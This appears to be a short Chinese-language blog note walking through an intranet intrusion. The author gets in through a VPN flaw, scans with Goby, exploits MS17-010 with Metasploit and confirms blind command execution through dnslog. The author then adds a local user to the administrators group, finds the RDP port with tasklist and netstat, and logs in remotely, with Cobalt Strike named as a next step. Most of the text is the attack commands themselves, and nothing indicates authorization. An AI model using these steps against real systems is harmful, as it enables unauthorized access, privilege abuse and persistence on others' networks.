首先通过某V**的漏洞,进入到某公司内网(这部分不写,上班了是这样的)
查看DNS
发现存在4.x和99.x两个网段(具体还有没有别的不知道,先测这两个)
直接Goby
启动
扫出了ms17_010,经典
Kali启动,在启动msf前,我们需要将msf连接到数据库中,方便扫描和目标的选择
systemctl start postgresql #开启postgresql数据库
msfdb init #初始化数据库
打开msf后
输入db_status
就可以看到数据库已经连接了
搜索ms17_010
序号1的模块能扫描,不带执行,序号0是执行命令,2是反弹shell,先使用1扫描整个网段
输入命令use 0
输入exploit
或者run
msf会将这些扫描成功的结果,导入到数据库中,输入hosts
就可以看到了
接着我们去执行命令的模块(不想用反弹shell的,基本没成功过)
因为前面扫描过了,所以数据库还有东西,我们需要筛选
导入后,我遇到过执行成功没有回显的,所以这里,用dnslog
来记录
首先获取一个dns
接着设置ms17_010执行的命令
(然后忘记截图了,自行脑部dnslog有记录的画面)
执行后,发现 xx机器是可以执行命令的
将rhosts单独设置为这个IP
set rhosts 192.168.99.x
set command net user <username> <password> /add
然后执行
成功执行, 然后添加管理员组
如果扫描端口,不知道哪个端口是远程桌面服务怎么办呢
执行命令
tasklist /svc
查看所有进程的PID
这台机器的远程桌面的服务的PID是2768
接着执行
netstat -ano
查看端口对应的PID
2768,刚刚好
添加完后,直接远程登录
到这一步后,其实可以cs上线,然后继续操作的,但是因为到饭点了,干饭人得先干饭,所以就先放着了
就当作小记录,不喜勿喷,喷了我也看不见